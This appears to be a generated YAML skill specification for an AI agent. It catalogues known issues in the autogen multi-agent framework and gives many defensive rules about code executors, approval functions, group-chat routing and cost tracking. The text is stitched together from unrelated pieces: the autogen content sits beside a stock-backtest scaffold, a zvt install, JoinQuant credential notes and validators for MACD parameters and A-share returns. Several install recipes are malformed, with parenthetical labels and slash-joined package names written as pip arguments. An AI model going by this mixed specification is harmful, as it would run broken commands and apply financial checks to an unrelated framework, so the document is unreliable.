    - id: BD-058
      type: B
      summary: RAG Agent — v0.2 feature, MISSING in v0.4
    - id: BD-059
      type: B
      summary: 'Whole framework: MAINTENANCE MODE per README:14,21,23,200,216,218'
    - id: BD-007
      type: B
      summary: '`LocalCommandLineCodeExecutor` is documented as the default for examples but emits UserWarning + advises Docker'
    - id: BD-008
      type: B/BA
      summary: CodeExecutorAgent default approval_func=None — auto-approve all generated code with UserWarning
    - id: BD-055
      type: T
      summary: '`work_dir="."` (current directory) emits DeprecationWarning on Local and Docker executors'
    - id: BD-060
      type: missing
      summary: '`LocalCommandLineCodeExecutor` docstring claims regex sanitization that does not exist anywhere in the codebase'
    - id: BD-061
      type: missing
      summary: No team-level cost aggregator — manual aggregation required across turns / agents
    - id: BD-062
      type: missing
      summary: No first-class output-format anomaly handler — SelectorGroupChat silently falls back; no first-class veto agent
    - id: BD-063
      type: missing
      summary: No standardized handoff multi-call handling — only the first HandoffMessage in a model response is executed
        (per docstring)
    - id: BD-064
      type: missing
      summary: No structured_output capability fallback — `max_retries_on_error > 0` opaquely fails on clients without it
    - id: BD-012
      type: T
      summary: One embedded runtime per group-chat instance (default)
    - id: BD-013
      type: B
      summary: team_id = uuid4() per construction (NOT keyed by team class)
    - id: BD-006
      type: B/BA
      summary: allow_repeated_speaker default = False in SelectorGroupChat
    - id: BD-010
      type: B
      summary: SelectorGroupChat — silent fallback to previous_speaker / first participant after max_selector_attempts
    - id: BD-014
      type: DK
      summary: LLM call branched on ModelFamily.is_openai() — SystemMessage vs UserMessage for selector prompt
    - id: BD-056
      type: B
      summary: Cost tracking — v0.2 feature, MISSING in v0.4
resources:
  packages:
  - name: pyautogen (DEPRECATED PROXY)
    version_pin: latest
  - name: autogen-core / autogen-agentchat / autogen-ext
    version_pin: latest
  - name: opentelemetry-api / opentelemetry-sdk
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install pyautogen (DEPRECATED PROXY)
    - python3 -m pip install autogen-core / autogen-agentchat / autogen-ext
    - python3 -m pip install opentelemetry-api / opentelemetry-sdk
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: '?'
    when: When evaluating LocalCommandLineCodeExecutor for any path that may receive LLM-generated code, especially when reading
      the class docstring sanitization claim
    action: Treat LocalCommandLineCodeExecutor as having ZERO input filtering. Never use it for untrusted/LLM-generated code
      without (a) wrapping in DockerCommandLineCodeExecutor for container isolation, OR (b) wrapping CodeExecutorAgent with
      an explicit approval_func (interactive prompt, hardcoded allowlist, or model_client_approval_func). Audit any existing
      setup of `CodeExecutorAgent(code_executor=LocalCommandLineCodeExecutor())` — this is the documented canonical example
      and is unsafe by default. Maintenance-mode SLA means this docstring will NOT be corrected upstream; document the gap
      in your own skill/wrapper.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When choosing a CodeExecutor backend for any production deployment or any path receiving LLM-generated code
    action: Instantiate `DockerCommandLineCodeExecutor(work_dir='coding', image='python:3-slim')` instead of `LocalCommandLineCodeExecutor()`.
      Confirm Docker daemon is running before starting. Use `await code_executor.start()` / `await code_executor.stop()` (or
      async context manager) to manage container lifecycle. Pin the image tag explicitly to avoid silent base-image upgrades;
      do NOT rely on `:latest`.
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  regular:
  - id: '?'
    when: When porting v0.2 cookbook / blog / tutorial code that uses `pip install pyautogen` and `from autogen import ConversableAgent`
    action: 'If you NEED the v0.2 API: `pip install "autogen-agentchat~=0.2"` (pin the v0.2 minor series). If you can migrate:
      rewrite to v0.4 with `from autogen_agentchat.agents import AssistantAgent` + `BaseGroupChat` family. Given maintenance-mode
      declaration (autogen-C-004), porting v0.2 cookbooks is unlikely upstream — assume the legacy code is on you to migrate.
      New projects: skip both v0.2 and v0.4, start on Microsoft Agent Framework (MAF).'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When making a strategic technology choice for a new multi-agent project in 2025 H2 or later
    action: 'For greenfield projects: choose Microsoft Agent Framework (MAF, github.com/microsoft/agent-framework) instead
      of autogen v0.4. For existing autogen v0.4 projects: freeze the dependency at the working version and plan a migration
      to MAF using the official guide (learn.microsoft.com/en-us/agent-framework/migration-guide/from-autogen/). Do NOT file
      feature requests against autogen — they will be closed ''won''t fix — please use MAF''. Bugs may still get attention
      but with no SLA; design your project to absorb that risk. Note CVE-level findings (autogen-C-001) will likely never
      be fixed.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When constructing a CodeExecutorAgent for any production or untrusted-input pipeline
    action: 'Always pass an explicit `approval_func`. Three documented patterns: (a) interactive prompt — print code + read
      user yes/no; (b) hardcoded allowlist — match `request.code` against safe-operations list (per `_code_executor_agent.py:283-295`
      example); (c) `model_client_approval_func` (LLM-as-judge, lines 347-396) — second LLM gates code from first LLM with
      a SystemMessage instruction and json_output=ApprovalResponse. ApprovalRequest / ApprovalResponse Pydantic models defined
      at lines 69-80. Any of these is better than None. Audit existing code for the pattern `CodeExecutorAgent(...)` without
      approval_func.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When using SelectorGroupChat for any high-stakes routing where wrong-agent selection has consequences (compliance,
      financial, safety)
    action: (a) Pass an explicit `selector_func` callable to bypass LLM selection entirely for deterministic routing. (b)
      If LLM selection is required, attach a handler to the `autogen_agentchat` trace_logger and ALERT on any line containing
      'Model failed to select a speaker after'. (c) Raise `max_selector_attempts` for high-stakes flows but recognize it does
      NOT eliminate fallback — eventually a bad output trips fallback. (d) Treat the absence of a stdlib warnings.warn / raise
      as a known-gap and design your own monitoring.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When deploying LocalCommandLineCodeExecutor on a Windows host
    action: 'At application startup, before any executor construction, call: `import sys, asyncio; if sys.platform == ''win32'':
      asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())`. Per docstring at `local/__init__.py:64-74`.
      Better cross-platform default: avoid LocalCommandLineCodeExecutor entirely (autogen-C-001 / autogen-C-002) and use DockerCommandLineCodeExecutor
      — Docker abstracts away the host event-loop policy issue.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When constructing a Swarm group chat with `Swarm(participants=[...], ...)`
    action: Place an AssistantAgent configured with `handoffs=[...]` (which makes it produce HandoffMessage) as the FIRST
      item in the participants list. Verify with `HandoffMessage in agent.produced_message_types` before construction. UserProxyAgent
      also produces HandoffMessage (per UC-012 HITL pattern). Other agents in the list don't need handoff capability if they're
      terminal or only respond.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When writing a custom driver / wrapper / orchestrator that invokes ChatAgent.on_messages directly (instead of using
      BaseGroupChat)
    action: 'Track the last-yielded turn index in your driver and pass only messages produced AFTER that index to the next
      on_messages call. If you must use a stateless driver (e.g., simple HTTP wrappers), construct a fresh agent per request
      and pass full history once — but understand the agent''s model_context grows from empty so cost/correctness shift to
      your driver. Inspect existing drivers for the anti-pattern: `await agent.on_messages(self.full_history, ...)` — fix
      to `self.full_history[last_index:]`.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When constructing AssistantAgent and considering both `tools=` and `workbench=` parameters
    action: 'Pick exactly one: (a) `tools=[FunctionTool(...), ...]` for a small fixed local tool set; (b) `workbench=McpWorkbench(StdioServerParams(...))`
      for an MCP server or other dynamic catalog. Convert any FunctionTool you want to keep into a workbench tool (or vice-versa)
      — do not mix them in one agent. If you need both static and dynamic tools, wrap multiple workbenches into a `Sequence[Workbench]`
      and pass as `workbench=`.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When constructing AssistantAgent with both `tools=` (or workbench tools) and `handoffs=`
    action: Before constructing, build a flat name set from your tools and verify no handoff name (or HandoffBase.target)
      appears in it. Use distinct namespaces (e.g., prefix handoffs with 'handoff_to_' or use the AssistantAgent name as suffix)
      to avoid accidental collision when adding new tools later. Document the rule in your team-construction wrapper.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When designing a FastAPI / web service that hosts an autogen team behind an HTTP / WebSocket route (per UC-006 pattern)
    action: Either (a) construct a fresh team per request (acceptable when team_id stability isn't required — note autogen-C-013
      boundary on team_id), OR (b) implement a per-team async lock and await stream completion before allowing the next request,
      OR (c) use a team pool keyed by session_id and serialize per-key. Do not share a singleton team across concurrent requests.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When implementing checkpoint / resume / cross-deploy state portability for BaseGroupChat instances
    action: Persist the team_id alongside the saved_state. On restore, reconstruct the team and explicitly inject the saved
      team_id (or use the same construction path that produced the original) so topic types align. If portability across machines
      / deployments is required, design a state-migration step that remaps topic types from the source uuid to the target
      uuid before load. Document this in your wrapper.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When constructing your own SingleThreadedAgentRuntime instance instead of relying on the BaseGroupChat embedded
      one
    action: If you're building an AgentChat-style consumer that iterates over team output, pass `SingleThreadedAgentRuntime(ignore_unhandled_exceptions=False)`
      so background exceptions don't get silently swallowed. If you're building a long-running core-API service that should
      keep processing despite individual agent failures, keep the default True (or pass True explicitly to make intent clear).
      Document the choice.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When sizing the runtime for production load — concurrent users, fan-out workflows, or bursty traffic
    action: 'Benchmark before committing to SingleThreadedAgentRuntime. For low/medium throughput single-process apps it''s
      the correct default. For high throughput: switch to WorkerAgentRuntime (gRPC) and per-agent processes per UC-007 pattern;
      coordinate via host process. Acknowledge cross-process latency tax. Cross-language deployments (UC-008 Python ↔ .NET)
      also require gRPC.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When porting v0.2 code or other multi-step-by-default patterns to v0.4 AssistantAgent
    action: Pass `max_tool_iterations=N` explicitly when you want the agent to chain multiple tool calls in one turn. Pair
      with `MaxMessageTermination(M)` or token-based termination to bound cost. Do NOT set N to a high value 'just in case'
      — model agency under high N invites unexpected loops on misconfigured tools. Pick N based on the longest legitimate
      chain in your workflow + a small safety margin.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When configuring AssistantAgent for structured output (output_content_type=) AND considering performance tuning
      of reflect_on_tool_use
    action: Default behavior is correct for most workloads — leave reflect_on_tool_use unset when using output_content_type.
      If you explicitly need to skip reflection (e.g., to save the second LLM call), make tools that return content already
      shaped to your Pydantic schema and accept that the agent may return non-conforming raw output otherwise. Document the
      override and add a validation step.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When configuring AssistantAgent with `handoffs=[...]` for any team that may issue parallel-tool-call-capable model
    action: 'On the model_client, pass `parallel_tool_calls=False` (e.g., `OpenAIChatCompletionClient(model=''gpt-4o'', parallel_tool_calls=False)`).
      Add a code-review check / lint rule for the pattern `AssistantAgent(..., handoffs=[...])` to enforce. Document the requirement
      in any handoff-using project''s setup guide. Note: Anthropic and other providers may have different config flag names
      — check the provider client''s options.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing any of the 6 abstract base classes (BaseGroupChatManager, ChatAgent, BaseChatAgent, ChatCompletionClient,
      CodeExecutor, Workbench) to add a new team type / agent / client / executor / workbench
    action: For each base class, implement EVERY method marked `@abstractmethod`. Use mypy / static check with `--strict`
      to catch missed abstracts at edit time rather than runtime. Per blueprint Stage 1-5 abstractmethods enumeration — refer
      to BD blueprint sections for exact line numbers per class.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When constructing any BaseGroupChat subclass (RoundRobinGroupChat / SelectorGroupChat / Swarm / MagenticOneGroupChat)
      with a custom participants list
    action: 'Validate inputs before construction: assert max_turns is None or max_turns > 0; assert all participant names
      are unique; verify the autogen-internal topic naming doesn''t collide (typically handled automatically when names are
      unique). When using custom topic schemes, ensure the group''s topic prefix is distinct from any participant''s. The
      4 errors are catch-able but each blocks construction independently.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When introducing a custom ChatCompletionClient subclass with a new ModelFamily not handled by `ModelFamily.is_openai`
    action: When subclassing ChatCompletionClient, ensure your `model_info['family']` is one of the recognized values, OR
      test selector behavior end-to-end with a SelectorGroupChat to confirm the wrap is appropriate for your model. If your
      model performs better with SystemMessage even though it's non-OpenAI family, file an upstream PR (low SLA — see autogen-C-004)
      or wrap the model behind an OpenAI-family alias for selection prompts.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When configuring SelectorGroupChat for flows where the same agent legitimately should speak multiple turns in a
      row
    action: Pass `allow_repeated_speaker=True` to SelectorGroupChat constructor. Verify by checking that previous_speaker
      remains in the candidate list visible to the LLM. If you only sometimes want repeats, write a custom `selector_func`
      that returns the agent name unconditionally and bypasses the LLM.
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When porting v0.2 client setup that used `config_list` for multi-model fallback
    action: Construct one ChatCompletionClient per model. For routing logic (cheap-vs-expensive, fallback on rate-limit, A/B),
      wrap a dispatcher class that picks the client based on task or signal and passes it to the agent. Track per-client cost
      via `model_client.actual_usage()` / `total_usage()` (note autogen-C-024 — no team-level aggregator).
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When operating an autogen v0.4 team in production where cost monitoring matters (any LLM-billed deployment)
    action: 'Implement custom cost aggregation: subscribe to runtime events / wrap each model_client with a cost-tracking
      decorator that logs after each `create()` / `create_stream()`. Expose roll-up via your observability stack (Prometheus,
      OTel, etc. — see autogen-C-026 for tracing). MagenticOneGroupChat is especially prone to surprise costs because it re-plans
      on stalls; track per-stall cost separately.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When porting v0.2 code that used TeachableAgent / RetrieveAssistantAgent or starting a v0.4 project that needs persistent
      memory or RAG
    action: 'For long-term memory: wire mem0 (or another memory layer) as an external service, exposed to AssistantAgent via
      Workbench tool or pre-prompt context. For RAG: build your own retrieval pipeline (vector DB + embedding + BM25 fusion)
      and expose as a Workbench tool. Mem0 ships an explicit autogen integration (cookbooks/mem0-autogen.ipynb, helper/mem0_teachability.py)
      per blueprint relations field. Do not wait for v0.4 first-class support — maintenance mode means it won''t come.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When deploying autogen to production where observability is required (debugging, cost attribution, performance monitoring)
    action: (a) Attach a handler to the `autogen_core.events` logger to capture envelope creation / agent invocation events.
      (b) Configure an OpenTelemetry exporter at app startup (auto-instrumentation libraries simplify this). (c) If you don't
      want runtime internals, set `AUTOGEN_DISABLE_RUNTIME_TRACING=true` and rely solely on app-level OTel spans you create.
      Combine with autogen-C-006's trace_logger handler to catch SelectorGroupChat fallbacks.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When writing install instructions, requirements.txt, pyproject.toml, or Dockerfiles for an autogen v0.4 project
    action: 'Use exact package names: `autogen-agentchat`, `autogen-core`, `autogen-ext`. Pin minor version explicitly (e.g.,
      `autogen-agentchat~=0.6.4`) to avoid surprise upgrades — maintenance-mode SLA means upstream bug-fix releases come on
      irregular cadence. For extras, use bracket syntax: `autogen-agentchat[openai,docker,mcp]`. Do NOT use bare `autogen`
      or `pyautogen` in requirements files.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When configuring AssistantAgent with tools that perform writes, mutations, or non-idempotent network calls
    action: Pass `parallel_tool_calls=False` on the model_client when ANY tool is non-idempotent / order-sensitive. For mixed
      tool sets (some safe to parallelize, some not), split into multiple agents — keep the parallel-safe tools on one agent
      and the serial-required tools on another. Per audit DAT item 2, this is also why `unconditional gather` was flagged
      'warn'.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When constructing LocalCommandLineCodeExecutor or DockerCommandLineCodeExecutor and tempted to use the current directory
    action: 'Pass an explicit subdirectory: `work_dir=''coding''` or `work_dir=Path(''./workspace'')`. Create the directory
      if missing. Add it to .gitignore if scratch outputs shouldn''t be tracked. Cross-cutting: pair with Docker (autogen-C-002)
      to fully isolate the workspace from the host filesystem.'
    severity: low
    kind: domain_rule
    modality: should_not
    consequence: null
  - id: '?'
    when: When configuring CodeExecutorAgent with retry-on-error AND considering / migrating to non-OpenAI providers
    action: Either (a) keep max_retries_on_error=0 (default) on providers without structured_output, OR (b) verify your model_client.model_info['structured_output']
      == True before passing to CodeExecutorAgent. For OpenAI / Azure / Anthropic this is True; for arbitrary Ollama / vLLM
      models, check the model_info dict — some custom-deployed models lie about structured_output capability and behave inconsistently.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When porting v0.2 cookbook code or following v0.2 tutorials on a v0.4 install
    action: 'Map v0.2 → v0.4 surface: ConversableAgent → AssistantAgent (or BaseChatAgent subclass); GroupChatManager → BaseGroupChat
      (RoundRobinGroupChat / SelectorGroupChat / Swarm / MagenticOneGroupChat); register_reply pattern → tools=[FunctionTool(...)]
      / workbench=. The v0.2 register_reply mechanism has no v0.4 equivalent — the actor model is incompatible with v0.2''s
      reply registration pattern. Refer to official migration-guide.md for full mapping.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When evaluating language coverage for an autogen-based project that needs a non-Python runtime
    action: 'For polyglot Python ↔ .NET: use the in-tree gRPC stack — protobuf schemas in `protos/`, Python WorkerAgentRuntime,
      .NET Microsoft.AutoGen / AutoGen.* packages (16 sub-packages). For thin TS clients: build them as web frontends talking
      to a Python FastAPI / WebSocket backend (UC-006 pattern). Do not search for an autogen JS/TS SDK on npm — it doesn''t
      exist as a runtime.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When choosing MagenticOneGroupChat for autonomous orchestration in production where cost control matters
    action: (a) Set `max_stalls` conservatively (e.g., 3-5 per typical workflow length) and pair with `MaxMessageTermination`
      as a hard upper bound. (b) Subscribe to runtime events (autogen-C-026 telemetry) to log every re-plan event. (c) Implement
      an external cost monitor that polls `model_client.actual_usage()` per turn and raises an alert when run cost crosses
      a budget threshold — autogen has no built-in budget guard.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When introducing a custom BaseChatMessage / BaseAgentEvent subclass OR when wiring agents directly through the runtime
      instead of via BaseGroupChat
    action: '(a) When using BaseGroupChat: include the custom type in your agent''s `produced_message_types` — auto-registration
      handles the rest. (b) When using runtime directly: explicitly register via MessageFactory before any publish; otherwise
      the receiving agent gets a deserialization error. (c) For StructuredMessage[T], the T type parameter must be a Pydantic
      model with stable schema.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When implementing a new ChatCompletionClient subclass for a custom provider
    action: Implement `model_info` (returning a ModelInfo TypedDict with all 5 required fields). Skip the deprecated `capabilities`
      property unless backward-compat with very old consumer code is required. Run `validate_model_info` to confirm the dict
      shape. Existing third-party clients implementing only capabilities will continue to work but emit DeprecationWarning
      at runtime.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When designing a multi-agent system whose correctness depends on routing fidelity (compliance, finance, safety-critical
      workflows)
    action: (a) Replace LLM selection with `selector_func` (a deterministic Python callable) for the routing tier — bypass
      the silent-fallback risk entirely. (b) If LLM selection is required, build an external anomaly handler that subscribes
      to `autogen_agentchat` trace_logger and pages on 'Model failed to select a speaker after' messages. (c) Add a 'veto
      agent' as a participant whose role is to flag risky decisions; route its decisions through your own logic since the
      framework has no built-in veto. (d) Combine with autogen-C-018 handoff protection.
    severity: high
    kind: domain_rule
    modality: should_not
    consequence: null
  - id: '?'
    when: When provisioning the runtime environment, container, or CI for an autogen v0.4 project
    action: Pin Python ≥3.10 in your Dockerfile / venv / CI matrix. Pin .NET ≥8.0 if using the .NET stack. Update legacy environments
      before installation; do not attempt to back-port. Confirm with `python --version` / `dotnet --version` at container
      build time, not at runtime.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing ChatCompletionClient to add a new model provider
    action: Implement all 9 abstract methods. For `capabilities`, return a stub matching legacy schema OR have it call into
      your model_info conversion. Implement `model_info` properly (autogen-C-035) — downstream features key on it. Implement
      actual_usage / total_usage to enable cost tracking (autogen-C-024). Implement count_tokens / remaining_tokens correctly
      for context-window-aware features (TokenLimitedChatCompletionContext).
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing CodeExecutor to add a new sandbox tier OR subclassing Workbench to add a new dynamic tool catalog
    action: 'For CodeExecutor: implement execute_code_blocks (the main async method) plus lifecycle (start/stop/restart).
      Use async context manager pattern: `async with MyExecutor() as ex: ...`. For Workbench: implement all 8 abstracts including
      list_tools / call_tool / save_state / load_state for catalog discovery + invocation + persistence.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When iterating over `team.run_stream()` output in a custom application
    action: 'Inspect each yielded message: if it''s a `GroupChatTermination` with a non-None error field, extract the SerializableException,
      log it (with correlation ID), and decide to retry / fail-open / surface to user. Do NOT just `for msg in stream: ...`
      and assume iteration completion = success — a termination with embedded exception looks like a normal termination unless
      you check the field. Pair with autogen-C-026 telemetry for context.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When swapping ChatCompletionClient provider (vendor neutrality, cost optimization, air-gapped requirement)
    action: '(a) Read `model_info` for the new client and confirm structured_output is True for the specific model id. (b)
      Run a small test that exercises Phase 2-equivalent JSON extraction with response_format={''type'':''json_object''} and
      verify output parses. (c) For Ollama / vLLM models, prefer ones with native JSON mode or grammar constraints. (d) For
      air-gapped: accept that structured output may fall back to free-text and add validation in your wrapper.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When deploying autogen with multiple providers (e.g., OpenAI + Anthropic + Azure) in the same process
    action: Pass API keys explicitly to each client constructor (e.g., `OpenAIChatCompletionClient(api_key=...)`) rather than
      relying on env vars that all clients might read. Use a per-client config object with explicit key field. For Kubernetes
      deployments, mount per-provider secrets and bind them to specific client constructors. Audit env var usage across clients
      to ensure keys aren't accidentally shared.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When writing a custom `selector_func` that explicitly calls a model_client with a directive prompt
    action: 'Inside your selector_func: branch on `model_client.model_info[''family'']` — for OpenAI family, wrap directive
      in SystemMessage; for non-OpenAI, wrap in UserMessage. Mirror the autogen built-in pattern at `_selector_group_chat.py:241-245`.
      If your custom selector ignores the family check, expect Anthropic / Gemini selector failures and resulting silent fallback
      (autogen-C-006) cascade.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When writing the first import statement after installing autogen-agentchat
    action: 'Use: `from autogen_agentchat.agents import AssistantAgent`; `from autogen_agentchat.teams import RoundRobinGroupChat`;
      `from autogen_ext.models.openai import OpenAIChatCompletionClient`; `from autogen_core import ...`. Do NOT use `from
      autogen import X` (ImportError) or `from pyautogen import X` (also fails per autogen-C-003).'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When using Anthropic, Gemini, or another non-OpenAI provider as the model_client for SelectorGroupChat
    action: (a) Set `max_selector_attempts=5` (or higher) instead of the default 3 to absorb format drift. (b) Provide a `selector_func`
      fallback that returns a sensible default agent on null/ambiguous LLM output. (c) Subscribe to autogen_agentchat trace_logger
      and alert on 'Model failed to select a speaker after' events. (d) For high-stakes flows, prefer OpenAI for the selector
      role even if other agents use Claude/Gemini for content.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When implementing a custom GroupChat / orchestrator that publishes its own termination events
    action: Catch unhandled exceptions in your runtime, wrap as SerializableException, publish via `GroupChatTermination(SerializableException.from_exception(e))`
      per `_base_group_chat.py:512-524` pattern. Do NOT raise to the consumer iterator directly; that breaks the iteration
      contract. Document the channel in your GroupChat's docstring so downstream consumers know to inspect.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When wiring an MCP server (playwright / filesystem / custom MCP) into AssistantAgent via Workbench
    action: (a) Verify the MCP server starts cleanly (`StdioServerParams` spawns a subprocess; HTTP variant requires a running
      endpoint). (b) Add health check for HTTPServerParams; for StdioServerParams, monitor child process exit codes. (c) Implement
      reconnect logic if the MCP server can crash mid-conversation — the agent will fail tool calls otherwise. (d) Pin the
      MCP server version (e.g., `npm install -g [email protected]`) for reproducibility.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When subclassing AssistantAgent to override on_messages_stream behavior or building a similar concrete ChatAgent
      subclass
    action: 'Mirror the 5-step structure: keep step 1 (context update from new messages) before step 4 (LLM call); keep step
      2 (memory injection) before step 4 OR carefully preserve the ''memory provides context'' contract some other way. Don''t
      move step 5 (tool loop) to a background task — synchronous return is the contract. Add tests that exercise tool flow
      + handoff + structured output to catch regressions.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When wiring up test fixtures vs production model_client and using ChatCompletionCache / ReplayChatCompletionClient
    action: Keep test client construction in test/conftest files only. Never instantiate ChatCompletionCache / ReplayChatCompletionClient
      in `app/main.py` or production paths. If you need a production cache layer, build your own caching wrapper around a
      real client — the autogen built-in is for deterministic test replays, not production caching. Add a CI check that flags
      ReplayChatCompletionClient in non-test paths.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When integrating autogen into a data / ML pipeline where feature extraction or transformation is one of the agent's
      tasks
    action: 'Never let an autogen agent (especially CodeExecutorAgent) write to or read from the production data store directly.
      Sandbox feature-extraction code execution behind Docker (autogen-C-002) AND approval_func (autogen-C-005). Treat agent
      output as untrusted; validate before persistence. For audit/compliance, document the boundary explicitly: ''autogen-generated
      code does NOT run with production data store credentials.'''
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When designing a polyglot Python ↔ .NET autogen system or porting Python concepts to .NET
    action: Treat the two stacks as separate APIs sharing only the protobuf wire format. Use `Microsoft.AutoGen` for new .NET
      work (aligned with the broader Microsoft Agent Framework). For per-provider .NET clients, use `AutoGen.{provider}`.
      Read `dotnet/src/AutoGen.Core/Middleware/` to understand the .NET pipeline model — IMiddleware / FunctionCallMiddleware
      / PrintMessageMiddleware structure behavior as request pipelines, not actor messages. The actor-pattern intuition from
      Python won't transfer.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
